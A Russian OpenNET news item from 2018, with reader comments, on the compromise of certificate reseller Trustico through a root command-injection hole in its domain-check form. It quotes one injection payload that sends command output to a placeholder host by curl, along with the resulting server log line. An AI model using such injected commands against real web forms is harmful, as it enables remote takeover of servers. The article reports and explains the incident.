The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

02.03.2018 09:05  Ожидается отзыв всех остальных сертификатов Trustico из-за полной компрометации сервера

Вчерашняя история с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из исследователей безопасности раскрыл тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. По информации от исследователя, продемонстрировавшего уязвимость, о проблеме было известно ранее и он почерпнул сведения из публичных источников. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе вместо имени проверяемого домена строки "$(curl http://1.2.3.4/`id`)" на хост 1.2.3.4 придёт запрос вида:


   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт Trustico выведен из строя и недоступен. Пока непонятно позволял ли взломанный сервер получить доступ к архиву закрытых ключей клиентских сертификатов, но до выключения сервера одному из экспериментаторов удалось найти в конфигурации web-сервера закрытый ключ для SSL-сертификата домена "*.trustico.com", который хранился на скомпрометированном сервере.

Проблема также затронула партнёрский сайт SSLDirect.com, который размещался на том же сервере, и генерировал сертификаты через Trustico, характеризуя данную компанию как одного из ведущих мировых центров сертификации ("Trustico is one of the worlds leading SSL Certificate issuers").

Представители удостоверяющих центров DigiCert и Comodo, которые выступали в роли партнёров Trustico, пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва всех выданных через Trustico сертификатов в течение 24 часов. При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

  1. Главная ссылка к новости (https://www.reddit.com/r/sysad...)
  2. OpenNews: 23 тысячи SSL-сертификатов будут отозваны из-за инцидента в Trustico
  3. OpenNews: Поставлена под сомнение валидность 30 тысяч HTTPS-сертификатов удостоверяющего центра Symantec
  4. OpenNews: Symantec продаёт удостоверяющий центр компании DigiCert
  5. OpenNews: Вступили в силу требования к удостоверяющим центрам по проверке CAA-записей в DNS
  6. OpenNews: Let's Encrypt занял 36% рынка удостоверяющих центров
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: trustico, ca, cert
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, Аноним (-), 09:18, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]
  • +30 +/
    Что вы делаете, прекратите! Я попкорн уже не успеваю из аргентины подвозить
     
     
  • 2.23, user (??), 12:27, 02/03/2018 [^] [ответить]    [к модератору]
  • –1 +/
    Из аргентинской муки нужно делать блины на лопате.
     
  • 1.2, Аноним (-), 09:19, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]
  • +/
    "Гори-гори ясно, чтобы не погасло!"
     
     
  • 2.5, Аноним (-), 09:24, 02/03/2018 [^] [ответить]    [к модератору]
  • +/
    > "Гори-гори ясно, чтобы не погасло!"

    Earth, Wind & Fire - Boogie Wonderland
    Scooter - Fire

     
  • 2.22, Аноним (-), 12:21, 02/03/2018 [^] [ответить]    [к модератору]
  • +1 +/
    The roof
    The roof
    The roof is on fire
    We don't need no water
    Let the motherfucker burn
    Burn, motherfucker, burn(C)
     
  • 1.3, Аноним (-), 09:22, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    урок коррупционерам
     
     
  • 2.11, Аноним (-), 10:15, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    я Вас умоляю, просто подкорректируют планы безотносительно к сути происшествия
     
     
  • 3.18, Аноним (-), 11:07, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    разумеется, на пути жадности нет преград
     
  • 2.44, Michael Shigorin (ok), 10:52, 03/03/2018 [^] [ответить]    [к модератору]  
  • –5 +/
    > урок коррупционерам

    Это Вы про тот почтовый сервер Хиллари?

     
     
  • 3.47, Аноним (-), 13:28, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Всем кто смеет хреново работать и раздолбайствовать.
     
     
  • 4.54, Dmitry77 (ok), 00:35, 04/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Ну как сказать.. хреново работает - тот кто принимает стандарты. Например DNS. Сертификаты - это  заплатка которая плохо держится.
     
  • 3.48, Аноним (-), 13:42, 03/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Нет, про получателей отката от комода за переход к ним с дигисерта Такое впечат... весь текст скрыт [показать]
     
  • 1.4, A.Stahl (ok), 09:23, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    Ну облажались. Бывает. Trustico это маленький посредник. Возможно там в штате 1 человек, он же хозяин-администратор-программист. Совершенно обычная ситуация. Ничего нового.
     
  • 1.6, commiethebeastie (ok), 09:25, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    >http://1.2.3.4/'id'

    CVSS 11?

     
  • 1.8, Аноним (-), 09:26, 02/03/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные, но так как... весь текст скрыт [показать]
     
     
  • 2.13, angra (ok), 10:34, 02/03/2018 [^] [ответить]    [к модератору]  
  • +5 +/
    >Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные

    А деньги есть только на студентов и индусов, так как почти все средства уходят на бонусы манагеров.

     
     
  • 3.34, Аноним (-), 18:42, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Так снесите Бастилию )
     
  • 2.17, Аноним (-), 11:04, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > внимательные, трудолюбивые и скромные

    послушные, согласные, умеющие в минимум полезных действий, внимание и трудолюбие ведут к убыткам

     
     
  • 3.24, Аноним (-), 12:32, 02/03/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    > внимание и трудолюбие ведут к убыткам

    В стартапах, да. В энтерпрайзе наоборот.

     
  • 2.27, Аноним (-), 13:05, 02/03/2018 [^] [ответить]     [к модератору]  
  • +/
    проблема в тех кто платит, не принёс новую звёздную идею - не достоин хорошего д... весь текст скрыт [показать]
     
  • 1.9, Аноним (-), 09:28, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    Уволенный из Equifax администратор, перешёл на работу в Trustico?
     
     
  • 2.10, нах (?), 09:52, 02/03/2018 [^] [ответить]     [к модератору]  
  • –3 +/
    уволенный поехал обратно в свою деревню под Бангалором, в трех тапках - два на н... весь текст скрыт [показать]
     
     
  • 3.45, mickvav (?), 11:18, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Вы так говорите, как будто чувак из мухосранска не мог админить оносайтик...
     
  • 1.15, Аноним (-), 10:37, 02/03/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • –1 +/
    И не отреагируют, сколько мы ни будем ожидать ... весь текст скрыт [показать]
     
  • 1.16, Аноним (-), 10:47, 02/03/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • +1 +/
    При этом представители Trustico заявили, что скомпрометированный сервер не имел ... весь текст скрыт [показать]
     
     
  • 2.19, Аноним (-), 11:12, 02/03/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    > И мы конечно верим им на слово, да?

    Я думаю, что эта фраза в конце новости подается просто для особого смака.

     
  • 2.20, Аноним (-), 11:27, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    в выигрыше остались те, кто доверился малозащищенному реселлеру - все они узнали, что скомпрометированы с приемлимой задержкой в границах TTT(time to trust).
     
  • 1.21, Zlo (??), 11:40, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач у всех остальных сертификаторов......прям совпадение.....
     
     
  • 2.25, Аноним (-), 12:47, 02/03/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    Не думаю
     
  • 2.26, Аноним (-), 12:57, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    А сам letsencrypt можно рассматривать как монокультуру...
     
  • 2.49, Аноним (-), 13:44, 03/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Это не совпадение, а следствие комод теряет доход и пытается подмять остатки би... весь текст скрыт [показать]
     
  • 1.28, Дуплик (ok), 13:40, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.
     
     
  • 2.29, Дудосер (?), 14:15, 02/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    А за щеку откладывать можно будет?
     
  • 2.30, Некто (??), 14:16, 02/03/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Ага И все браузеры, использующие HTTPSSS на блокчейне , в свободное время буду... весь текст скрыт [показать]
     
     
  • 3.31, ананас (?), 14:27, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Да и ещё выкачивать уже подписанные сертификаты чтобы проверять локально
     
  • 3.35, Диалектик (?), 18:58, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Зачем самостоятельно что-то майнить? Вон возьми тот же блокчейн namecoin и используй нахаляву.
     
  • 2.41, Аноним (-), 08:11, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    но ведь namecoin уже есть.
     
  • 1.32, mumu (ok), 16:54, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +3 +/
    > передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.

    #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной школы имеет под собой серьёзные аргументы.

     
     
  • 2.33, Некто (??), 17:10, 02/03/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    >> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.
    > #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной
    > школы имеет под собой серьёзные аргументы.

    А еще "... они будут исполнены на сервере с правами root", что однозначно указывает, что их веб сервер работал под рутом!

    Запрет на пользование интернетом до окончания начальной школы от таких уродов не спасет. Нужна юридическая норма на пожизненный запрет пользования компьютером.

     
     
  • 3.36, Аноним (-), 19:23, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    если форенсик сможет с убедительной вероятностью указать на конкретное лицо, с которым не будет некоторого рода проблем. а уж запрет пользования..
     
  • 1.37, кек (?), 21:31, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    >Суть  выявленной уязвимости в передаче пользовательского ввода в обработчик на  shell без экранирования спецсимволов

    шел 2018 год...

     
  • 1.38, Аноним (-), 22:23, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    Где то видел статью о том что дешевле быть взломанным чем тратить деньги на грамотных специалистов. Такова селяви
     
     
  • 2.39, Аноним (-), 23:10, 02/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Дешевле не значит выгоднее.
     
  • 2.40, Аноним (-), 00:17, 03/03/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    Еще дешевле вообще не заморачиваться с сайтами, не делать их вообще. Расходов ровно 0. Заодно и не сломают.
     
  • 2.42, Ordu (ok), 08:45, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Поэтому сейчас в США даже республиканцы задумываются о том, что сфера IT требует большего регулирования со стороны государства. Чтобы быть взломанным было бы дороже.
     
     
  • 3.43, Аноним (-), 09:36, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    никто не застрахован от ошибок, можно учиться жить без компьютера, пока регулятор не утянул всех под лёд
     
  • 3.53, Аноним (-), 18:07, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    непонял, это как: "запретить взламывать" или "запретить быть взламываемыми"?
     
  • 1.46, Тот_Самый_Анонимус (?), 11:41, 03/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.
     
  • 1.52, Kuromi (ok), 17:42, 03/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.
    Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.
     
     
  • 2.55, Kuromi (ok), 06:05, 05/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов
    > от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация
    > не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка
    > - в мае.
    > Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов
    > на затронутых сайтах, наконец-то.

    И, само смешное, спустя пару дней включили назад.

     
  • 1.56, Аноним (-), 03:23, 06/03/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Прекрасно Находил такие дыры лет 12 назад много где, но не думал, что такое до ... весь текст скрыт [показать]
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor